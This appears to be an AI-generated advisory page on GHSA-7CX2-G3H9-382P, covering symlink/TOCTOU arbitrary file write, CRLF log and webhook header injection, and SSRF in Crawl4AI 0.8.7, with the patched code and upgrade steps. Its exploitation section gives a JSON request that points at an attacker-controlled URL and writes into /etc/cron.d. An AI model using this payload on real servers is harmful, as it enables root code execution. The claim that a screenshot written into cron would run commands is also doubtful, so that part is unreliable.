CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-7CX2-G3H9-382P

GHSA-7CX2-G3H9-382P: Multiple Vulnerabilities in Crawl4AI Docker API (Arbitrary File Write, SSRF, CRLF Log Injection)

Alon Barad
Alon Barad
Software Engineer

Jun 16, 2026·6 min read·5 visits

Executive Summary (TL;DR)

Crawl4AI <= 0.8.7 suffers from path traversal via symlink resolution bypasses, leading to arbitrary file write and potential RCE. It also lacks validation for log streams and webhook headers, allowing log manipulation and request smuggling. Version 0.8.8 addresses these issues.

An in-depth technical analysis of multiple security vulnerabilities in the self-hosted Docker API server of Crawl4AI up to version 0.8.7. These flaws include a critical arbitrary file write via symlink traversal and TOCTOU weakness, CRLF log injection, webhook header injection, and SSRF filter gaps. These have been remediated in version 0.8.8.

Vulnerability Overview

The self-hosted Docker API server deployment of Crawl4AI (crawl4ai) provides high-performance web crawling capabilities designed to ingest web pages for Large Language Model (LLM) and Retrieval-Augmented Generation (RAG) ingestion pipelines.\n\nTo allow users to retrieve rendered visual assets, the API endpoints /screenshot and /pdf accept an optional parameter named output_path. This parameter determines where generated output files are saved on the filesystem of the container.\n\nIn Crawl4AI version 0.8.7 and earlier, the path containment checks and request parameter validations were insufficient to protect the host filesystem. This technical report details a primary Arbitrary File Write vulnerability via symlink-following and Time-of-Check to Time-of-Use (TOCTOU) weaknesses, alongside concurrent CRLF Log Injection, Webhook Request-Header Injection, and Server-Side Request Forgery (SSRF) bypasses.

Root Cause Analysis

The primary vulnerability stems from an insecure validation implementation within the validate_output_path() function in deploy/docker/utils.py. The function was designed to prevent path traversal (CWE-22) by checking whether the target path resolved within the ALLOWED_OUTPUT_DIR. However, in version 0.8.7, this validation only performed a literal string-based comparison using Python's startswith() method.\n\nBecause the function did not resolve underlying symbolic links (symlinks) using os.path.realpath, it permitted path components that pointed to symlinks. An attacker who could create or reference a symlink inside the ALLOWED_OUTPUT_DIR (pointing to an external directory like /etc/cron.d or /usr/local/bin) could bypass containment. The string representation of the target path (e.g., outputs/symlink_dir/malicious_file) started with the allowed prefix, but the subsequent write operation would follow the symlink, writing the output directly to the external target.\n\nFurthermore, the file creation process was vulnerable to a Time-of-Check to Time-of-Use (TOCTOU) race condition. Because files were opened using standard open(..., 'wb') modes without defensive flags like O_NOFOLLOW, the filesystem would unquestioningly resolve symlinks at the moment of file output, even if the destination was checked right before. Concurrently, the Webhook component was vulnerable to CRLF Injection (CWE-93/CWE-113) because arbitrary custom headers from the request body were forwarded to outgoing HTTP requests without character sanitization.

Code Analysis

To understand the exact changes made to remediate these flaws, consider the diff of deploy/docker/utils.py. The vulnerable containment check in version 0.8.7 was strictly string-based:\n\npython\n# Vulnerable implementation in 0.8.7\nif not abs_path.startswith(abs_allowed):\n raise HTTPException(...)\n\n\nThis code failed to resolve symbolic links. In the patched version 0.8.8, the validation was hardened to resolve the physical path recursively using os.path.realpath() on the parent directory before verifying containment:\n\npython\n# Hardened implementation in 0.8.8\nreal_parent = os.path.realpath(os.path.dirname(abs_path))\nreal_path = os.path.join(real_parent, os.path.basename(abs_path))\nstring_ok = abs_path.startswith(abs_allowed)\nreal_ok = (real_path + os.sep).startswith(abs_allowed)\nif not (string_ok and real_ok):\n raise HTTPException(status_code=400, detail="output_path must resolve within allowed dir")\n\n\nTo address the TOCTOU symlink following vulnerability, a new writing function, write_output_file(), was introduced. This function leverages file descriptor flags including os.O_NOFOLLOW to actively block symlink resolution at the final target component:\n\npython\ndef write_output_file(abs_path: str, data: bytes) -> None:\n os.makedirs(os.path.dirname(abs_path), exist_ok=True)\n flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)\n fd = os.open(abs_path, flags, 0o600)\n with os.fdopen(fd, "wb") as f:\n f.write(data)\n\n\nAdditionally, the log injection vulnerability (CWE-117) was remediated by registering a CRLFSafeFilter that strips carriage returns, newlines, and non-tab control characters from all logged records. Webhook security was hardened by adding a strict regular expression validator sanitize_webhook_headers() that blocks restricted headers (such as Host or Cookie) and prevents CRLF sequences in header names or values.

Exploitation Methodology

Exploitation of the Arbitrary File Write vulnerability requires a multi-step sequence to achieve remote code execution in a Docker environment. The following Mermaid diagram demonstrates the logic bypass of the path validation filter:\n\nmermaid\ngraph LR\n A["POST /screenshot request"] --> B["Extract output_path parameter"]\n B --> C["validate_output_path() validation"]\n C --> D{"Is string prefix matching?"}\n D -- Yes --> E["Passes 0.8.7 startswith() check"]\n E --> F["Write file payload"]\n F --> G["Target OS resolves symlink"]\n G --> H["File written to /etc/cron.d (RCE)"]\n\n\nTo execute this attack, the adversary must have a mechanism to create a symbolic link inside the directory defined by ALLOWED_OUTPUT_DIR. In scenarios where a shared volume or a secondary write vector is present, the attacker creates a symbolic link outputs/link pointing directly to a highly critical system directory such as /etc/cron.d or /etc/logrotate.d.\n\nOnce the symlink is placed, the attacker triggers an unauthenticated POST request to /screenshot with the payload:\n\njson\n{\n "url": "http://attacker-controlled-site.com/malicious_payload",\n "output_path": "link/cron_job"\n}\n\n\nThe API server verifies outputs/link/cron_job against the string pattern. Since it begins with the correct prefix, the check succeeds. The system then takes the screenshot output (or PDF document) and writes it to the target file. Since link resolves to /etc/cron.d, the file is written to /etc/cron.d/cron_job. The host or container's cron daemon subsequently parses the script, executing the injected commands as the root user.

Impact Assessment

The cumulative impact of the vulnerabilities disclosed under GHSA-7CX2-G3H9-382P is high. Under the primary Arbitrary File Write flaw, an unauthenticated attacker can achieve arbitrary file write access across any writable partition of the container filesystem. When combined with typical Docker configurations where container services execute as privileged users, this vulnerability can lead directly to remote code execution (RCE) on the container.\n\nThe concurrent Webhook Header Injection vulnerability allows attackers to perform HTTP Request Smuggling, override critical headers like Host or Authorization, and route internal requests to external attacker-controlled infrastructure. This exposes internal API keys and system authorization tokens. Additionally, the CRLF Log Injection flaw allows attackers to compromise log integrity by writing arbitrary fake logs, which could obfuscate malicious activity or crash automated Security Information and Event Management (SIEM) systems.

Mitigation & Remediation

To remediate all security issues covered under GHSA-7CX2-G3H9-382P, administrators and developers must immediately upgrade Crawl4AI deployments to version 0.8.8 or later. If utilizing the PyPI package directly, execute the following command:\n\nbash\npip install -U crawl4ai>=0.8.8\n\n\nIf using the official Docker container, pull the latest image containing the patch:\n\nbash\ndocker pull unclecode/crawl4ai:0.8.8\n\n\nAs a temporary workaround or hardening measure, ensure that the API container runs with a read-only root filesystem. This prevents write operations outside designated volume mounts, neutralizing the path traversal RCE vector. Furthermore, enable API authentication using the CRAWL4AI_API_TOKEN environment variable to ensure all administrative endpoints require valid authentication before processing requests.

Official Patches

unclecodeCrawl4AI Official Security Advisory Detailed Technical Notice

Fix Analysis (1)

Technical Appendix

CVSS Score
8.1/ 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Systems

Crawl4AI self-hosted Docker API server deployments <= 0.8.7

Affected Versions Detail

Product
Affected Versions
Fixed Version
crawl4ai
unclecode
<= 0.8.70.8.8
AttributeDetail
CWE IDCWE-59 (Link Following), CWE-22 (Path Traversal)
Attack VectorNetwork (AV:N)
CVSS v3.1 Score8.1 (High)
EPSS ScoreN/A (GitHub Security Advisory)
ImpactArbitrary File Write / Remote Code Execution
Exploit Statuspoc
KEV StatusNot Listed

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1083File and Directory Discovery
Discovery
CWE-59
Improper Link Resolution Before File Access ('Link Following')

The application does not properly resolve symbolic links before opening files, allowing arbitrary file writes outside the restricted container outputs directory.

Known Exploits & Detection

GitHub Security Advisory DatabaseResponsible disclosure of Arbitrary File Write, SSRF, and credential exfiltration vulnerabilities.

Vulnerability Timeline

Responsible disclosure reports submitted by independent researchers.
2026-04-13
Maintainer releases v0.8.7 addressing first-wave concerns.
2026-06-01
Security patch commit developed and merged into the main codebase.
2026-06-02
Crawl4AI v0.8.8 released resolving vulnerability pathways.
2026-06-04
Official GHSA-7CX2-G3H9-382P Advisory Published.
2026-06-16

References & Sources

  • [1]GitHub Advisory Database Record
  • [2]Fix Patch Commit (Crawl4AI)
  • [3]Version 0.8.7 ... 0.8.8 Code Comparison
  • [4]Crawl4AI Official Issue Tracker
  • [5]Crawl4AI Pull Request Fix Reference

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 5 hours ago•GHSA-JWM3-QCFW-C5PP
5.1

GHSA-jwm3-qcfw-c5pp: Security Bypass in n8n Python Code Node AST Validator

An authenticated security-bypass vulnerability in n8n allows users with workflow creation or modification privileges to bypass the Python AST security validator. By circumventing AST validation logic, attackers can execute arbitrary statements, access the task executor's root module namespace, and disclose sensitive host environment variables on self-hosted instances.

Amit Schendel
Amit Schendel
7 views•6 min read
•about 5 hours ago•GHSA-H3JJ-5F3V-3685
6.4

GHSA-H3JJ-5F3V-3685: Public API Execution Retry Authorization Bypass in n8n

An incorrect authorization vulnerability in the Public API of n8n allows authenticated users with read-only permissions to bypass access control boundaries. By invoking the execution retry endpoint, an unauthorized user can trigger workflow executions, effectively escalating their privileges from workflow:read to workflow:execute.

Amit Schendel
Amit Schendel
5 views•5 min read
•about 11 hours ago•GHSA-M3Q2-P4FW-W38M
2.3

GHSA-M3Q2-P4FW-W38M: Cross-Site Scripting (XSS) via Unsafe innerHTML Assignment in Nuxt <NoScript> Component

A low-severity Cross-Site Scripting (XSS) vulnerability in Nuxt's globally registered <NoScript> head component allows unauthenticated attackers to execute arbitrary JavaScript. By injecting dynamic, untrusted data into <NoScript> slots, standard Vue HTML escaping is bypassed because the component processes slot text nodes and assigns them directly to the target element's innerHTML property instead of textContent. In modern browsers with scripting enabled, this raw injection can implicitly close the <noscript> tag, triggering script execution.

Amit Schendel
Amit Schendel
5 views•8 min read
•about 12 hours ago•CVE-2026-49993
5.7

CVE-2026-49993: Proprietary Source Code Exfiltration via Incomplete Same-Origin Verification in Nuxt Dev Servers

CVE-2026-49993 identifies an incomplete same-origin check validation mechanism in @nuxt/webpack-builder and @nuxt/rspack-builder dev server middleware. When the local development server is bound to a non-loopback address, cross-origin attackers can bypass verification checks by suppressing browser headers, leading to unauthorized retrieval and exfiltration of compiled source code chunks.

Amit Schendel
Amit Schendel
8 views•4 min read
•about 13 hours ago•GHSA-69QJ-PVH9-C5WG
7.5

GHSA-69QJ-PVH9-C5WG: Command Injection in yt-dlp `--exec` Option

An OS command injection vulnerability in yt-dlp before 2026.06.09 allows unauthenticated remote attackers to execute arbitrary shell commands via crafted media metadata when a user processes media using the --exec post-processing parameter with unsafe string interpolation conversions.

Alon Barad
Alon Barad
10 views•7 min read
•about 15 hours ago•GHSA-F989-C77F-R2CQ
8.2

GHSA-f989-c77f-r2cq: LLM Credential Exfiltration and SSRF in Crawl4AI Docker Server

A technical evaluation of the Crawl4AI open-source web crawling and scraping library revealed a high-severity credential exfiltration vulnerability in its self-hosted Dockerized API server. The flaw arises from an unvalidated base_url parameter in request payloads and a dynamic prefix resolution mechanism that retrieves system environment variables. Unauthenticated remote attackers can leverage these features in tandem to extract host-level secrets or redirect configured LLM API keys to an external listener under their control.

Amit Schendel
Amit Schendel
6 views•6 min read